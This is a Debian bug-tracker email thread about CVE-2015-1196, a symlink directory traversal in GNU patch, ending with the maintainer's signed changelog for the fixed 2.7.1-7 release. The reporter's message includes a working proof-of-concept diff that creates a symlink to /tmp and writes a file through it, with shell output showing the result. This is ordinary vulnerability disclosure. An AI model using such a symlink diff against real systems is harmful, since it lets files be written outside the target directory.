Bug#775227: marked as done (patch: CVE-2015-1196: directory traversal via symlinks)

Tue, 20 Jan 2015 13:23:42 -0800 

Your message dated Tue, 20 Jan 2015 21:18:53 +0000
with message-id <[email protected]>
and subject line Bug#775227: fixed in patch 2.7.1-7
has caused the Debian Bug report #775227,
regarding patch: CVE-2015-1196: directory traversal via symlinks
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
775227: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=775227
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: patch
Version: 2.7.1-6
Tags: security
patch now support git-style patches, which allows creating symlinks. This feature can be abused for directory traversal. As a proof of concept, applying the attached patch creates a file in /tmp: 

$ ls /tmp/moo
/bin/ls: cannot access /tmp/moo: No such file or directory

$ mkdir empty && cd empty

$ patch -p1 < ~/traversal.diff
patching symbolic link tmp
patching file tmp/moo

$ ls /tmp/moo
/tmp/moo


-- System Information:
Debian Release: 8.0
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages patch depends on:
ii  libc6  2.19-13

--
Jakub Wilk

diff --git a/tmp b/tmp
new file mode 120000
index 0000000..cad2309
--- /dev/null
+++ b/tmp
@@ -0,0 +1 @@
+/tmp
\ No newline at end of file
diff --git a/tmp/moo b/tmp/moo
new file mode 100644
index 0000000..eec8c88
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo

--- End Message ---
--- Begin Message --- 
Source: patch
Source-Version: 2.7.1-7

We believe that the bug you reported is fixed in the latest version of
patch, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <[email protected]> (supplier of updated patch package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 20 Jan 2015 19:34:19 +0000
Source: patch
Binary: patch
Architecture: source amd64
Version: 2.7.1-7
Distribution: unstable
Urgency: high
Maintainer: Laszlo Boszormenyi (GCS) <[email protected]>
Changed-By: Laszlo Boszormenyi (GCS) <[email protected]>
Description:
 patch      - Apply a diff file to an original
Closes: 775227 775540 775793
Changes:
 patch (2.7.1-7) unstable; urgency=high
 .
   * Backport patches from upstream Git tree:
     - fix CVE-2015-119: directory traversal via symlinks (closes: #775227),
     - infinite loop while applying patch (closes: #775540),
     - segmentation fault while applying corrupted patch (closes: #775793).
Checksums-Sha1:
 3ccd6e6153fe56cd6c8d8d9da65ac0f7b8364b96 1751 patch_2.7.1-7.dsc
 bbd77e7fdebd12348c9f91ee89946bbddd2756be 12448 patch_2.7.1-7.debian.tar.xz
 6947302639febb8e6ccc241a8cf96f969830ee89 97324 patch_2.7.1-7_amd64.deb
Checksums-Sha256:
 390dd7f91f6a1490fe20a5f773fd93e906648ca267dca82e42541e36a9bab417 1751 
patch_2.7.1-7.dsc
 f644d8fc6b0e7d3a92fd51ea631f1454645192380f126a96ca89aa6f359a03de 12448 
patch_2.7.1-7.debian.tar.xz
 0183b9f43e9912d177d81ecc094150d12a825d9cd927f0554df9683c39273626 97324 
patch_2.7.1-7_amd64.deb
Files:
 fb67b05e757cfefacaacb4cc17f8c786 1751 vcs standard patch_2.7.1-7.dsc
 c1390b649f17fc4f4542fac704a49a01 12448 vcs standard patch_2.7.1-7.debian.tar.xz
 a4912dd0292de7c728200dc05061cd53 97324 vcs standard patch_2.7.1-7_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJUvreBAAoJENzjEOeGTMi/R/wQAKSsnV4e3FhqU44a+UoHWqFI
+gosEDHdiywFMRGXhzBnFFk1RglGQRZzL1zUAHEKPwjNsJlG/H/938mB27ENeCz5
QhKhLH4DuOdHkO/6MRKKGrq2KkyyiDckUgiI9huc/6kGy2LeHBDgYDK4XkXWku6c
fqtPxUbJJhr6F0iK39dnmmbs2m7+zlR8HovC8mh8MjXMKe9n9OlCEg0fW8XBFxQ8
rO+1cFi1omrpo9H+S9cJyui9r6SwNaYIAid4+nHYGyfEb7bHwgS3pXUl5+PR0WLx
M51iyvMRhvPQbG46Dfw38qq3je25G+Yh/ZP/LAMFqRuXSps4klkW64HPdwj6xG56
pTiHdW9XaGMQgZDr4Wh/oRlCI2Sv0+oWPaN7WwCdpuKJDXNK4LmfRDo1wCo2XmUl
bbOhOlNFqFkiPGvUkHasZVkXYvXIsksF0jEXfaOP1DBnDnWvzl4TOF42zBc/UQN/
T+CraOqcIpc/d1Vo3LiN6RiGE5PEDn0KVqtStqBN0WCvzXQxRXgBShC0B+uR+eR8
oz4CNjd3IFrds2gYsbHwyXNdu2BaSvgNXagKjn1dOwIpVYH2kF2ALq54xZyu4Rgo
EkubGqKUqMcFynGp1Ug+bj5GtLZVY4JZlpAkw0lqQR53UIxAW7YBlVucL8BxS7/7
l8aLL1krXbpOG6wJS7R0
=Azom
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to